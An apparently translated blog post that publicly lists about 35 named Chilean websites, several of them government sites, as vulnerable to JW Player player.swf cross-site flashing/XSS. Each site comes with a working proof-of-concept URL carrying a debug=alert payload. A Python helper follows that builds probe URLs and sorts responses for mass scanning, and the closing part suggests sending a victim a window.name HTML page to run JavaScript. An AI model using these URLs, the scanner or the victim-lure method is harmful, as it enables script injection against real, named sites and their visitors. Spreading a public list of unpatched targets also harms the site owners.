Searching for Chilean sites that have JW Player present, and checking whether the deployed version was vulnerable or had already been updated or patched against Cross Site Flashing / XSS, with the help of a small Perl script and Google I came across a number of sites that are affected by this vulnerability. In every URL below the `debug` flashvar carries `alert("XSFF")` (percent-encoded); a vulnerable player.swf executes that value as JavaScript in the origin of the site hosting the file, which is what makes it an XSS and not just a Flash quirk.
List of affected Chilean sites:
TOP 8 || Government and well-known sites
http://hacienda.gov.cl/js/jwplayer/player.swf?debug=alert%28/XSFF/%29
http://www.adnradio.cl/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.24horas.cl/skins/24horas/gfx/jwplayer/jwplayer.swf?debug=alert%28%22XSFF%22%29
http://www.despegapyme.cl/js/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
https://gondwana.cl/~gondwana/plugins/muscolplayers/jwplayer/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.gobiernosantiago.cl/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.iansa.cl/wp-content/themes/IANSA-2010/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.ccu.cl/wp/wp-content/themes/CCU-2011/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.cruzverde.cl/rps_cruzverde_v60/opensite/Cruz%20Verde%20Internet/style/images/guateros-peluche/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
MORE ....
http://www.suralim.cl/wp-content/themes/suralim-2011/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://onirika.cl/web/wp-content/themes/vernissage/js/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.atmosferas.cl/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.riomagico.cl/wp-content/themes/slash/js/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.jokers.cl/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://elearning.ucsh.cl/dokeos/main/inc/lib/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.espaciourbano.cl/scripts/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.b2publicidad.cl/portal1/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.ptovaras.cl/web2/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.radiounochile.cl/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.semanadelachilenidad.cl/js_global/jquery/plugins/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
https://fol.cl/Content/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://casalerelacionescomunitarias.cl/nivelacion_estudios/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.gamtv.cl/wp-content/themes/gamtv/scripts/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.nosk.cl/js/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.saludv.cl/javascript/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.simmarent.cl/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.webgo.cl/wp-content/themes/webgo/js/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
https://www.fondosonline.cl/Content/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.nevasa.cl/wp-content/uploads/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.caballoyrodeo.cl/js_global/jquery/plugins/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.attic.cl/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://maiporafting.cl/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://home.cambio21.cl/cambio21/js-local/jquery/plugins/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.maspack.cl/js/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
http://www.procleanmg.cl/jwplayer/player.swf?debug=alert%28%22XSFF%22%29
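As an added example (not the author's Perl script, which is not reproduced on this page), the Python helper below shows the triage step a scan like the one described above has to do: it builds candidate player.swf URLs from the path patterns that recur in the list, appends the `debug` payload with the same percent-encoding as the URLs above, and recognises a genuine SWF response by its file header rather than by a 200 status, so that HTML soft-404 pages are not counted as hits. The host name, the path list and the sample SWF bytes are constructed assumptions; the `playerReady` string check is only a heuristic that the file is a JW Player build exposing that callback, not a version check, so every hit still has to be confirmed in a browser.

```python
"""Offline triage helper for the JW Player player.swf `debug` flashvar XSF/XSS.

Added example: not the author's script. Builds the probe URLs, the PoC URL in
the same form as the list on this page, and classifies fetched bytes as SWF or
not. No network requests are made; fetching is left to the caller.
"""
import urllib.parse
import zlib

# Relative paths under which player.swf appears in the list above.
# Assumption: a scan tries each of these on every host; extend as needed.
COMMON_PATHS = (
    "jwplayer/player.swf",
    "js/jwplayer/player.swf",
    "scripts/jwplayer/player.swf",
    "wp-content/uploads/jwplayer/player.swf",
    "js_global/jquery/plugins/jwplayer/player.swf",
)

# The payload used throughout the list above. A vulnerable player.swf runs the
# value of `debug` as JavaScript in the origin of the site hosting the file.
PAYLOAD = 'alert("XSFF")'

SWF_SIGNATURES = (b"FWS", b"CWS", b"ZWS")  # uncompressed, zlib, LZMA


def build_probe_urls(host, paths=COMMON_PATHS, scheme="http"):
    """Candidate player.swf URLs to request for one host."""
    return [f"{scheme}://{host}/{path}" for path in paths]


def build_poc_url(swf_url, payload=PAYLOAD):
    """Append the debug flashvar, percent-encoding ( " ) exactly as the
    URLs above do (alert%28%22XSFF%22%29)."""
    return swf_url + "?debug=" + urllib.parse.quote(payload, safe="")


def parse_swf(data):
    """Parse the 8-byte SWF header: 3-byte signature, 1-byte version,
    4-byte little-endian uncompressed length. Returns a dict or None when the
    bytes are not a SWF. CWS bodies are zlib-inflated; ZWS (LZMA) bodies are
    left compressed, so string checks on them will not match."""
    if len(data) < 8 or data[:3] not in SWF_SIGNATURES:
        return None
    signature = data[:3].decode("ascii")
    body = data[8:]
    if signature == "CWS":
        try:
            body = zlib.decompress(body)
        except zlib.error:
            return None  # header says zlib but the body is not: not a usable SWF
    return {
        "signature": signature,
        "version": data[3],
        "declared_length": int.from_bytes(data[4:8], "little"),
        "body": body,
    }


def classify_response(status, data):
    """Triage one probe response by HTTP status and body bytes.

    'missing'      -> non-200 status
    'not-swf'      -> 200 but not a SWF (typically an HTML soft-404 page)
    'swf'          -> a SWF, but the playerReady callback string is absent
    'swf-jwplayer' -> a SWF exposing playerReady; test the PoC URL by hand
    The Content-Type header is deliberately ignored: misconfigured servers
    label .swf files as text/html and vice versa.
    """
    if status != 200:
        return "missing"
    swf = parse_swf(data)
    if swf is None:
        return "not-swf"
    # Heuristic, not a version check: JW Player's ExternalInterface callback
    # name appears as a plain string in the (decompressed) movie body.
    if b"playerReady" in swf["body"]:
        return "swf-jwplayer"
    return "swf"


def make_sample_swf(strings, compressed=True):
    """Constructed test data: an SWF-shaped blob (valid header, not a playable
    movie) whose body contains the given byte strings."""
    body = b"\x00".join(strings)
    signature = b"CWS" if compressed else b"FWS"
    header = signature + bytes([10]) + (8 + len(body)).to_bytes(4, "little")
    return header + (zlib.compress(body) if compressed else body)


if __name__ == "__main__":
    for url in build_probe_urls("www.example.cl"):  # constructed host
        print(build_poc_url(url))
    jw = make_sample_swf([b"ExternalInterface", b"playerReady", b"debug"])
    print(classify_response(200, jw))                         # swf-jwplayer
    print(classify_response(200, b"<html>Not Found</html>"))  # not-swf
    print(classify_response(404, b""))                        # missing
```

Feed `classify_response` the status and raw body of each probe URL; only `swf-jwplayer` results are worth opening with the `debug` payload, and a `not-swf` 200 is the usual false positive from sites that answer every path with their home page.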
Let's continue. It is also possible to exploit this via "window.name", as shown in the Example, in the following way: upload this .html and send it to a victim, and it executes JavaScript code; the rest is up to your imagination. Another researcher who covers this topic is Dedalo (@SeguridadBlanca) on his blog.

Example 1: This example simply uses javascript:alert(1) as the value in window.name to make the playerReady function take the value of it.
Finish!
2 comments:
Shinee, could you do a step-by-step explanation so people can learn.